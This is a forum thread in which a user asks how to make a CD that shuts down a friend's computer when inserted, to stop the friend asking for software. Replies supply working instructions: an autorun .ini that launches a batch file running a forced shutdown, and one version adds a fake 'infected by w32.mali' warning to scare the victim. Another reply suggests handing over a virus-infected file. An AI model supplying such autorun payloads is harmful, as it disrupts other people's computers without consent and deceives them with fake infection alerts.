Results 1 to 5 of 5

Thread: Create cd that Shutdown the Computer if used

  1. #1
    Join Date
    Nov 2009
    Posts
    117

    Create cd that Shutdown the Computer if used

    Hi, I want to create cd which when played on computer, the computer will shutdown automatically. One of my friend making me too bore for softwares all the time and I want to give him that so, that he will never ask for me any software and other material. So, help me.

  2. #2
    Join Date
    Apr 2008
    Posts
    598

    Re: Create cd that Shutdown the Computer if used

    Hi, I don't think that this is possible with the help of any cd or something. And tell that friend directly that you are not interested to give him any material or something so, he will not ask for it to you. I am not having anything regarding this. If I am able to find it, I will post it to you. I think you need to use any virus infected file, so he never ask you for anything from your computer.

  3. #3
    Join Date
    Apr 2008
    Posts
    395

    Re: Create cd that Shutdown the Computer if used

    Hi, you can create cd that shutdown the computer if used with the following trick, try it. While writing the cd just use following. Open two notepad files One and Two respectively. Into the One type "open=shutdown.bat" and save it with the extention of .ini. Now open Two and type
    @echo off
    C:\WINDOWS\system32\shutdown.exe -s -f -t 200 and save it with the extention of .bat.
    Now save these files to the cd and burn it. You have done what you want.

  4. #4
    Join Date
    Apr 2008
    Posts
    392

    Re: Create cd that Shutdown the Computer if used

    Hi, you want to create cd that will shutdown the computer if used then you just need to create one bat file and then just save that bat file into the cd by adding it while burning.

    Code:
    @echo off
    C:\WINDOWS\system32\shutdown.exe -s -f -t 600 -c "Some of the files of your Computer has been Infected by w32.mali and needs to shut down"
    Now before computer shut down it will show the message of "Some of the files of your Computer has been Infected by w32.mali and needs to shut down".

  5. #5
    pritamsingh98 Guest

    Re: Create cd that Shutdown the Computer if used

    Quote Originally Posted by FlashX View Post
    Hi, you can create cd that shutdown the computer if used with the following trick, try it. While writing the cd just use following. Open two notepad files One and Two respectively. Into the One type "open=shutdown.bat" and save it with the extention of .ini. Now open Two and type
    @echo off
    C:\WINDOWS\system32\shutdown.exe -s -f -t 200 and save it with the extention of .bat.
    Now save these files to the cd and burn it. You have done what you want.
    hey thanx useful information

Similar Threads

  1. create one click shutdown and restart menu
    By harsh_maurya in forum Windows Software
    Replies: 1
    Last Post: 09-11-2010, 07:42 PM
  2. WMP 11 Shutdown my computer
    By Orton in forum Windows Software
    Replies: 3
    Last Post: 08-04-2009, 10:16 AM
  3. Replies: 1
    Last Post: 02-04-2009, 04:00 PM
  4. Replies: 1
    Last Post: 19-03-2009, 10:32 AM
  5. How to create a message for shutdown ?
    By Elsie in forum Software Development
    Replies: 3
    Last Post: 27-12-2008, 01:50 PM

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
Page generated in 1,711,657,330.41525 seconds with 17 queries